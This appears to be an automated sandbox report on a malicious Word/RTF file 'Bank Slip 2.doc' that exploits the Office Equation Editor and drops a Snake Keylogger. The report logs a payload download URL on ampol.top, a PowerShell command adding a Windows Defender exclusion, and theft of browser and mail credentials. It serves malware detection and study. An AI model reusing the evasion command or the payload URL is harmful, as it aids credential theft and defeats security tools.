            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 8010000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 54B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 9010000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 58B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 3C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 2230000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 5E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2933Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1409Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeWindow / User API: threadDelayed 9721Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1764Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3172Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3380Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3392Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3348Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3384Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3416Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3416Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3420Thread sleep count: 92 > 30Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3420Thread sleep count: 9721 > 30Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3500Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003CFCB8 LdrInitializeThunk,7_2_003CFCB8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory written: C:\Users\user\AppData\Roaming\obie8920193.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obie8920193.exe "C:\Users\user\AppData\Roaming\obie8920193.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess created: C:\Users\user\AppData\Roaming\obie8920193.exe "C:\Users\user\AppData\Roaming\obie8920193.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeQueries volume information: C:\Users\user\AppData\Roaming\obie8920193.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeQueries volume information: C:\Users\user\AppData\Roaming\obie8920193.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.864677424.00000000023DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.864677424.00000000023DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts33
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts111
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory13
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
            Obfuscated Files or Information            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares1
            Email Collection            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Install Root Certificate            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            Remote System Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Modify Registry            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1465556 Sample: Bank Slip 2.doc Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for URL or domain 2->48 50 14 other signatures 2->50 8 WINWORD.EXE 291 18 2->8         started        process3 process4 10 EQNEDT32.EXE 11 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 36 ampol.top 104.21.53.203, 443, 49163 CLOUDFLARENETUS United States 10->36 26 C:\Users\user\AppData\...\obie8920193.exe, PE32 10->26 dropped 28 C:\Users\user\...\FcdBUj68lnCbMtB[1].exe, PE32 10->28 dropped 60 Installs new ROOT certificates 10->60 62 Office equation editor establishes network connection 10->62 64 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->64 17 obie8920193.exe 1 8 10->17         started        file6 signatures7 process8 signatures9 38 Machine Learning detection for dropped file 17->38 40 Adds a directory exclusion to Windows Defender 17->40 42 Injects a PE file into a foreign processes 17->42 20 obie8920193.exe 12 2 17->20         started        24 powershell.exe 4 17->24         started        process10 dnsIp11 30 reallyfreegeoip.org 20->30 32 reallyfreegeoip.org 188.114.96.3, 443, 49165, 49166 CLOUDFLARENETUS European Union 20->32 34 4 other IPs or domains 20->34 52 Tries to steal Mail credentials (via file / registry access) 20->52 54 Tries to harvest and steal browser information (history, passwords, etc) 20->54 56 Installs new ROOT certificates 24->56 signatures12 58 Tries to detect the country of the analysis system (by using the IP) 30->58

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Bank Slip 2.doc39%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\obie8920193.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exe100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            http://reallyfreegeoip.org0%Avira URL Cloudsafe
            https://reallyfreegeoip.org0%Avira URL Cloudsafe
            http://checkip.dyndns.org/q0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
            https://ampol.top/FcdBUj68lnCbMtB.exe100%Avira URL Cloudmalware
            https://ampol.top/FcdBUj68lnCbMtB.exej100%Avira URL Cloudmalware
            https://ampol.top/100%Avira URL Cloudmalware
            https://ampol.top/FcdBUj68lnCbMtB.exettC:100%Avira URL Cloudmalware
            http://checkip.dyndns.org/0%Avira URL Cloudsafe
            http://checkip.dyndns.org0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
            http://checkip.dyndns.com0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/8.46.123.3340%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ampol.top
            		104.21.53.203
            		truetrue
              		unknown
              reallyfreegeoip.org
              		188.114.96.3
              		truetrue
                		unknown
                checkip.dyndns.com
                		158.101.44.242
                		truefalse
                  		unknown
                  checkip.dyndns.org
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://checkip.dyndns.org/false
                    • Avira URL Cloud: safe
                    		unknown
                    https://ampol.top/FcdBUj68lnCbMtB.exetrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33false
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ampol.top/EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://ampol.top/FcdBUj68lnCbMtB.exejEQNEDT32.EXE, 00000002.00000002.354581271.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://checkip.dyndns.org/qobie8920193.exe, 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ampol.top/FcdBUj68lnCbMtB.exettC:EQNEDT32.EXE, 00000002.00000002.354581271.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://reallyfreegeoip.orgobie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022EC000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.orgobie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
